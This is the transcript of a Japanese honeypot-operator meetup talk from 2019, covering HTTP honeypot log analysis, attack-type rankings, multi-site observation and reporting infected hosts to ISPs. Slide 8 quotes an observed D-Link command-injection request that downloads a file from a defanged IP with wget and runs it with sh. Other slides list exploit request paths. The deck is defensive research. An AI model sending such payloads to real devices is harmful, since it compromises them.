$30 off During Our Annual Pro Sale. View Details »

ハニーポッター流社会貢献

S-Owl
March 09, 2019
Technology
0
2.1k

 ハニーポッター流社会貢献

2019年3月9日 第6回 ハニーポッター技術交流会 LT発表資料
#hanipo_tech
第6回ハニーポッター技術交流会
https://hanipo-tech.connpass.com/event/120318/

S-Owl

March 09, 2019
Tweet

More Decks by S-Owl

See All by S-Owl
件名:顔文字のランサムウェアNemtyに感染するばらまきメールの分析
sec_s_owl
3
540
ハニーポットログの 読み方(初級編)
sec_s_owl
0
1.9k

Other Decks in Technology

See All in Technology
実装がすべてではない、開発者の周りから考える Web プロダクトセキュリティ
oldbigbuddha
0
190
機械学習システム構築実践ガイド
shibuiwilliam
0
200
The future is already here – Mastering the challenges of the coming years
ufried
0
150
太田博三
otanet
0
160
異なる思想で書かれたコードの統一に動く -Terraformの場合-
coconala_engineer
0
180
なぜコピペで使うコンポーネント集を利用するのか?
mottox2
6
4.5k
Cloud Security Day 2023パネルディスカッション資料
coconala_engineer
0
130
LangChainとフルサーバーレスですばやくセキュアなRAGアプリをつくるための実践解説/LangChain_Book
yoshidashingo
8
2.8k
Exploring Postgres VACUUM with the VACUUM Simulator
keiko713
5
610
エンタープライズSaaSへの挑戦〜顧客の事業を成長させるプロダクトマネジメントとは?〜 / pmconf2023
route06
2
130
決済事業のアーキテクチャとそれを⽀える AlloyDB
sansantech
PRO
6
1.3k
(JSConf JP 2023) LLM (大規模言語モデル) 全盛時代の開発プラクティス
baseballyama
8
3.6k

Featured

See All Featured
How GitHub (no longer) Works
holman
299
140k
Code Reviewing Like a Champion
maltzj
511
38k
Streamline your AJAX requests with AmplifyJS and jQuery
dougneiner
130
9.8k
How to train your dragon (web standard)
notwaldorf
71
4.8k
Designing for Performance
lara
601
66k
Bootstrapping a Software Product
garrettdimon
PRO
299
110k
Mobile First: as difficult as doing things right
swwweet
214
8.3k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
24
2k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
0
1k
From Idea to $5000 a Month in 5 Months
shpigford
376
45k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
185
15k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
271
12k

Transcript

  1. ハニーポッター流
    社会貢献
    第6回 ハニーポッター技術交流会
    2019/03/09(Sat)
    S-Owl

    View Slide

  2. アジェンダ
     Whoami
     with honeypot
     ログ分析
     ハニーポットの設置点による違い
     観測結果の活用

    View Slide

  3. Whoami

    View Slide

  4. whomai
    S-Owl ( @Sec_S_Owl )
    ・職業:元PSOCのアナリスト、ログ分析をしていました。
    今は不審メールの調査とマルウェアの解析が中心。
    ・http専門のハニーポッター(2018/6/5~ 1年未満)
    毎日簡単に分析してログをblogに残してます
    ブログ: https://sec-owl.hatenablog.com/

    View Slide

  5. 我が家のハニーポット
     スペック
     ソフトウェア:WOWHoneypot / 対象ポート:80/tcp
     ドメイン:取得済、未公開 / 設置IP:日本のIP
     運用:2018/6/5から開始
    今年のアクセス数推移

    View Slide

  6. アクセスランキング
    順位 種別 件数
    1 phpのWebShell設置の調査 8171
    2 Tomcat管理ページのブルートフォース攻撃 6019
    3 phpMyAdminの調査 3821
    4 通常アクセス 839
    5
    GPONルータの脆弱性(CVE-2018-10561)を
    突くMirai亜種の攻撃 339
    6 Apache Struts2の脆弱性を突く攻撃 231
    7 PHPWetherMapの調査 81
    8 Apache Struts2の脆弱性を突く攻撃 53
    9 WordPressの調査 51
    10 IISの脆弱性(CVE-2017-7269)を突く攻撃 47
    11 WebDAVの調査 46
    12 クローリング 46
    13 不正中継の調査 38
    14 Gitの調査 29
    その他含む全アクセス数 : 20035
    1月のアクセスランキング 2月のアクセスランキング
    順位 種別 件数
    1 phpのWebShell設置の調査 5022
    2 phpMyAdminの調査 1865
    3 通常アクセス 856
    4 Tomcat管理ページのブルートフォース攻撃 216
    5 不正中継の調査 108
    6
    GPONルータの脆弱性(CVE-2018-10561)を
    突くMirai亜種の攻撃 69
    7 HordeIMPの脆弱性を狙った調査 49
    8 PHPWetherMapの調査 45
    9 クローリング 44
    10 WordPressの調査 28
    11 ThinkPHPの脆弱性を突いた攻撃 27
    12 Apache Struts2の脆弱性を突く攻撃 26
    13 WebDAVの調査 25
    14 IISの脆弱性(CVE-2017-7269)を突く攻撃 25
    その他含む全アクセス数 : 8479

    View Slide

  7. ハニーポットのログ分析
    参考

    View Slide

  8. 例:D-Linkの脆弱性を突く攻撃(再掲)
     「GET /login.cgi?cli=aa aa';wget hxxp://185.62.190[.]191/r -O ->
    /tmp/r;sh /tmp/r’$」
     Exploit-DBのサイト内をクエリ内容の一部で調査
     狙っていると思われるexploitが判明し、対象の機器やCVEが分かる

    View Slide

  9. 例:Kubernetesの調査
     同一IPから来るアクセスをまとめて調査し製品を推測
     その製品のexploitを調査し、アクセス内容と同じか確認

    View Slide

  10. 例:Apexis IP CAMの調査
     Googleでアクセスパスを直接検索
     アクセスすると製品が直接判明したり。(他社提供してることも)

    View Slide

  11. ログ分析の効率化
     日次でバッチ処理で統計を取得し分析
     一度分析したアクセスパスは分析結果を蓄積
     こんなリストが1300行以上。
    リスト共有可能です。
    リクエスト 種別
    GET /phpMyadmi/index.php phpMyAdminの調査
    POST /guai.php phpのWebShell設置の調査
    GET /index.action
    Apache Struts2の脆弱性S2-045(CVE-2017-5638)
    を突く攻撃
    POST /gpon80Form/diag_Form?images/
    GPONルータの脆弱性(CVE-2018-10561)を突く
    Mirai亜種の攻撃
    GET /api/v1/pods Kubernetesの調査
    GET /bea_wls_deployment_internal
    Weblogicの脆弱性(CVE-2018-3252)に対する調査行

    POST /TP/public/index.php?s=captcha ThinkPHPの脆弱性を突いた攻撃
    GET hxxp://www.minghui.org/ 不正中継の調査

    View Slide

  12. 気になること
    ハニーポットの観測の違い

    View Slide

  13. ハニーポットのネットワーク依存性
     #ハニーポット観察 を見ていると、同じアクセスを受けたり
    受けなかったりと観測にズレるものがある。
     思いますよね?
     有名機関によるネットワーク定点観測
     NICT / NICTERWEB (ダークウェブ観測)
     警察庁 / @police (全国の警察施設に設置したセンサー)
     JPCERT / TSUBAME (アジア・太平洋地域インターネット定点観測)
     IIJ / ハニーポット (設置点はレポートからは不明)
     これらの主にポートスキャンでも、傾向に違いがでる
     観測するネットワークによって、傾向に違いがある

    View Slide

  14. ハニーポットを複数設置
     複数IPでハニーポットを稼働させた
     使い慣れたWOWHoneypotを使用
    (全ポート見た方が傾向の違いがよく出るだろうと思うので、
    そのうちHoneyTrap等に変えたい…)
     対象は以下の4サーバ
    種別 事業者 IP 稼働日 備考
    メイン IDCF 210.140.82.xxx 2018/06/05 ドメインあり
    IDCF 210.152.87.xxx 2019/02/28
    ABLE 150.66.13.xxx 2019/02/27
    特殊 KAGOYA 133.18.169.xxx 2019/02/25 ドメインあり
    ルールなし

    View Slide

  15. 観測結果(アクセス数)
    0
    100
    200
    300
    400
    500
    600
    700
    800
    900
    1時
    20時
    2時
    8時
    14時
    21時
    1時
    13時
    19時
    23時
    5時
    11時
    15時
    23時
    5時
    12時
    17時
    21時
    2時
    7時
    14時
    18時
    22時
    2時
    7時
    12時
    18時
    0時
    4時
    8時
    12時
    16時
    20時
    0時
    7時
    11時
    17時
    21時
    3時
    9時
    15時
    19時
    23時
    3時
    7時
    11時
    15時
    19時
    23時
    2月
    25

    2月26日 2月27日 2月28日 3月1日 3月2日 3月3日 3月4日 3月5日 3月6日 3月7日
    210.140.82.xxx
    210.152.87.xxx
    150.66.13.xxx
    133.18.169.xxx
    観測量が増加するタイミングが一致する時もある

    View Slide

  16. 観測結果(アクセス種別)
     追加で50以上の新しいアクセスを観測
     同種のアクセスでもIPによりアクセス量が異なる
     ドメインのあるIPには特にWordPressのアクセスが多い
     IPをベースにパス名を決めるようなアクセスはIPが多い方が分かる
    0
    200
    400
    600
    800
    1000
    1200
    133.18.169.xxx
    210.140.82.xxx
    133.18.169.xxx
    210.140.82.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    2月
    25日
    2月
    26日
    2月27日 2月28日 3月1日 3月2日 3月3日 3月4日 3月5日 3月6日 3月7日
    phpのWebShell設置
    の調査
    phpMyAdminの調査
    Tomcat管理ページ
    へのブルート
    フォース攻撃
    WordPressの調査
    Apache Struts2の脆
    弱性を突く攻撃
    ThinkPHPの脆弱性
    を突いた攻撃

    View Slide

  17. 観測結果(アクセス種別)
     IoT編
     同種のアクセスでもIPによりアクセス量が異なる
     数が少なくて誤差の範囲、かも
    0
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    133.18.169.xxx
    210.140.82.xxx
    133.18.169.xxx
    210.140.82.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    133.18.169.xxx
    150.66.13.xxx
    210.140.82.xxx
    210.152.87.xxx
    2月
    25日
    2月
    26日
    2月27

    2月28日 3月1日 3月2日 3月3日 3月4日 3月5日 3月6日 3月7日
    GPONルータの脆弱性
    (CVE-2018-10561)を
    突くMirai亜種の攻撃
    D-Linkルータの脆弱
    性(CVE-2015-2051)の
    調査
    Linksysの脆弱性を狙
    うMirai亜種
    D-Linkの脆弱性を狙
    うMirai亜種
    NUUO NVRの脆弱性
    (CVE-2018-15716)の
    調査

    View Slide

  18. 観測結果の活用
    してますか?

    View Slide

  19. 観測結果の活用
     ハニーポットを運用する目的は、なんですか?
     スキャン活動の監視
     マルウェア検体の入手
     攻撃手法の収集
    etc…
     何かに活用してますか?
     こういった活用はどうでしょうか、という一つの提案です

    View Slide

  20. その1:情報共有
     ハニーポッターなら、よその様子、気になります
     #ハニーポット観察でアウトプット
     観測点により検知傾向が違うため、検知したものを共有して欲しい
     自分もほぼ毎日blog更新予定
     うちのblogのアクセスは大半がgoogle検索によるもの
     アクセスパスを載せることで、同じようなアクセスを受けた人が探す際に
    ヒットすると思われる
     情報共有、してもらえませんか?
     構築やツール等のblogも助かります
     ハンティングルールも共有して欲しいな

    View Slide

  21. その1:情報共有
     情報発信していると、預かり知らぬところで活用されることも
    インターネット定点観測レポート(2018年 10~12月)
    https://www.jpcert.or.jp/tsubame/report/report201810-12.html

    View Slide

  22. その2:日本のアクセスの調査
     日本からのアクセスを抽出
    日付 パス 国 都市 送信元IP AS
    01-30 /GponForm/diag_Form?style/ JP 横浜 180.46.119.xxx
    AS4713: OCN NTT
    Communications
    Corporation, JP
    01-25 /GponForm/diag_Form?style/ JP 横浜 180.46.119.xxx
    01-04 /GponForm/diag_Form?style/ JP 180.15.94.xxx
    01-16 /GponForm/diag_Form?style/ JP 東京 153.201.255.xxx
    01-10 /GponForm/diag_Form?style/ JP 横浜 153.203.117.xxx
    01-04 /GponForm/diag_Form?style/ JP 東京 153.167.52.xxx
    01-26 /GponForm/diag_Form?style/ JP 大阪 125.192.167.xxx AS2518: BIGLOBE BIGLOBE
    Inc., JP
    01-25 /GponForm/diag_Form?style/ JP 大阪 125.192.167.xxx
    01-18 /GponForm/diag_Form?images/ JP 東京 119.175.232.xxx
    AS9824: JTCL-JP-AS
    Jupiter
    Telecommunication Co.
    Ltd, JP
    01-03 /GponForm/diag_Form?style/ JP 東京 27.141.162.xxx
    01-03 /GponForm/diag_Form?style/ JP 60.62.222.xxx
    01-03 /GponForm/diag_Form?style/ JP 60.62.222.xxx
    01-04 /GponForm/diag_Form?style/ JP 大阪 60.56.134.xxx AS17511: K-OPTICOM K-
    Opticom Corporation, JP
    01-03 /GponForm/diag_Form?style/ JP 京都 121.82.133.xxx
    01-04 /GponForm/diag_Form?style/ JP 佐世保 203.135.246.xxx AS7679: QTNET Kyushu
    Telecommunication
    01-03 /GponForm/diag_Form?style/ JP 福岡 116.94.49.xxx

    View Slide

  23. その2:分析
     日本からのアクセスを抽出
     GPONの脆弱性を突かれて、他のIPにスキャンをかけているのでは?
     該当IPをshodanで調べると、うち1つがQNAP NASと判明
     QNAP と言えば、VPNFillterマルウェアで踏み台になっている可能性
    CN=QNAP NAS/[email protected]

    View Slide

  24. その2:NOTICE
     日本からのアクセスを抽出
     GPONの脆弱性を突かれて、他のIPにスキャンをかけているのでは?
     該当IPをshodanで調べると、うち1つがQNAP NASと判明
     QNAP と言えば、VPNFillterマルウェアで踏み台になっている可能性
     マルウェア感染が疑われる場合、通知しよう
     各ISPでは迷惑行為等の調査受付をするabuse窓口がある
     そこに通知することで、対処される、可能性がある
     脆弱性を突かれた機器を観測できれば自分たちで対応できる
     NOTICEを待たずとも日本のセキュリティのために動ける

    View Slide

  25. まとめ
     ハニーポットは設置場所に見えるものが違う
     複数植えるのも楽しい
     ハニーポットの観測結果は是非情報共有して下さい!
     #ハニーポット観察
     ハニーポッターだから取れるアクションもある
     日本のセキュリティをもっと良くしていきたい

    View Slide

  26. FIN

    View Slide